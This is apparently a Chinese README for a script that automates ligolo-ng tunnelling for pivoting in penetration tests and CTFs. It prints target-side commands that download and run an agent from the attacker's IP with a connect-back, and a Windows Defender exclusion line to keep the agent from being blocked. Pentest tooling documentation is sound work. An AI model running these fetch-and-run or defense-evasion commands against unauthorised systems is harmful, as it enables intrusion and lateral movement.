Real-Fruit-Snacks/LigoloSupport

## 快速开始 ### 前置条件 - **Linux** (Kali, Ubuntu, Debian) 并拥有 root/sudo 权限 - **curl**, **jq**, **tar** (用于二进制文件的下载和解压) - **python3** (可选，用于 HTTP 文件服务器) ### 安装 ``` curl -O https://raw.githubusercontent.com/Real-Fruit-Snacks/LigoloSupport/main/ligolo-helper.sh chmod +x ligolo-helper.sh ``` ### 运行 ``` sudo ./ligolo-helper.sh auto ``` 按照屏幕上的说明传输 agent、连接、选择会话、添加路由并启动隧道。 ### 验证 ``` # 隧道运行后，测试连接性 nmap -sV 10.10.10.0/24 # Scan target network ssh user@10.10.10.20 # SSH to internal host curl http://10.10.10.50 # Access internal web server ``` ### 清理 ``` sudo ./ligolo-helper.sh cleanup ``` ## 功能 ### 一键配置 运行 `sudo ./ligolo-helper.sh auto`，脚本将下载 ligolo-ng 二进制文件，创建 TUN 接口，在端口 8000 上启动文件服务器，并启动 proxy。 ``` sudo ./ligolo-helper.sh auto ``` ### 自动 IP 检测 通过按优先级检查 `tun0`、`tun1`、`tap0` 和默认路由，自动检测您的攻击 IP。所有生成的命令均使用您的实际 IP。 ``` # 检测顺序：tun0 -> tun1 -> tap0 -> default route ``` ### 多平台 Agent 下载适用于 Linux (amd64/arm64)、Windows (amd64) 和 macOS (arm64) 的 agent 二进制文件。为每个平台提供传输命令，包括 curl、PowerShell `iwr` 和 certutil 备用方案。 ``` ./ligolo-helper.sh agent-cmd # Show all agent commands ./ligolo-helper.sh agent-cmd 10.0.0.1 # With custom IP ``` ### 完整清理 按顺序移除所有路由，停止文件服务器和 proxy，并拆除 TUN 接口。不会留下残留进程或过期路由。 ``` sudo ./ligolo-helper.sh cleanup ``` ### 模块化命令 每个操作都可作为独立的子命令使用，以便对配置过程进行精细控制。 ``` ./ligolo-helper.sh download # Download binaries only sudo ./ligolo-helper.sh setup-tun # Create TUN only sudo ./ligolo-helper.sh add-route 10.10.10.0/24 ./ligolo-helper.sh status # Show current state ``` ### 分步指导 配置完成后，脚本会显示编号步骤，其中包含用于 agent 传输、连接、会话选择、路由添加和隧道启动的确切命令。 ``` STEP 1: Download agent on target machine curl http://10.10.14.5:8000/ligolo-agent -o /tmp/a && chmod +x /tmp/a STEP 2: Run agent on target /tmp/a -connect 10.10.14.5:11601 -ignore-cert ``` ## 架构 ``` ligolo-helper.sh Single-file setup script (all logic) README.md Documentation LICENSE MIT License ``` 脚本遵循线性执行流程：从 GitHub releases 下载二进制文件，通过 `ip tuntap` 创建 TUN 接口，启动 Python HTTP 文件服务器用于传输 agent，然后启动 `ligolo-proxy` 并设置 trap 以在退出时进行清理。 ## 所有命令 | 命令 | 需要 Root | 描述 | |---------|------|-------------| | `auto` | 是 | 完整配置 —— 下载、配置、启动 proxy | | `cleanup` | 是 | 停止 proxy、文件服务器，移除路由和 TUN | | `download` | 否 | 下载 ligolo-ng 二进制文件到 `~/.ligolo-ng` | | `setup-tun` | 是 | 创建并激活 TUN 接口 | | `teardown-tun` | 是 | 移除 TUN 接口 | | `proxy [opts]` | 否 | 使用自定义选项启动 proxy | | `add-route ` | 是 | 添加路由到 TUN | | `del-route ` | 是 | 从 TUN 移除路由 | | `agent-cmd [ip]` | 否 | 显示所有平台的 agent 命令 | | `status` | 否 | 显示二进制文件、TUN、路由和 proxy 状态 | ## 配置 | 变量 | 默认值 | 描述 | |----------|---------|-------------| | `LIGOLO_DIR` | `~/.ligolo-ng` | 二进制文件存储目录 | | `TUN_NAME` | `ligolo` | TUN 接口名称 | | `PROXY_PORT` | `11601` | Proxy 监听端口 | ``` PROXY_PORT=443 sudo ./ligolo-helper.sh auto LIGOLO_DIR=/opt/ligolo sudo ./ligolo-helper.sh download ``` ## 故障排除 **Agent 无法连接** —— 确保 proxy 端口已开放： ``` iptables -I INPUT -p tcp --dport 11601 -j ACCEPT ``` **Windows Defender 阻止 agent** —— 在下载前添加排除项： ``` Add-MpPreference -ExclusionPath "C:\Users\Administrator\a.exe" ``` **添加路由时连接断开** —— 请勿将目标自身的网络通过 ligolo 进行路由。仅路由目标后方的内部网络。 **无效的 CIDR 前缀** —— 网络地址必须与前缀边界对齐（例如，`10.1.146.0/24`，而不是 `10.1.146.5/24`）。 ## 安全 通过 [SECURITY.md](SECURITY.md) 报告漏洞 —— 请勿公开提交 issue。 LigoloSupport **不会**： - 修改 ligolo-ng 源代码或二进制文件 - 存储凭据或敏感数据 - 在清理后持久化 - 开放除 proxy 端口和文件服务器以外的端口 - 绕过任何安全控制 ## 致谢 - [ligolo-ng](https://github.com/nicocha30/ligolo-ng) 作者 Nicolas Chatelain - [官方文档](https://docs.ligolo.ng/) ## 许可证 [MIT](LICENSE) —— Copyright 2026 Real-Fruit-Snacks

标签：CTF工具, IP 地址批量处理, Ligolo-ng, Pivoting, TUN接口, 内网穿透, 命令执行, 安全合规, 安全测试, 应用安全, 攻击性安全, 文件传输, 横向移动, 漏洞搜索, 端口转发, 编程规范, 网络代理, 网络安全, 网络路由, 隐私保护, 隧道搭建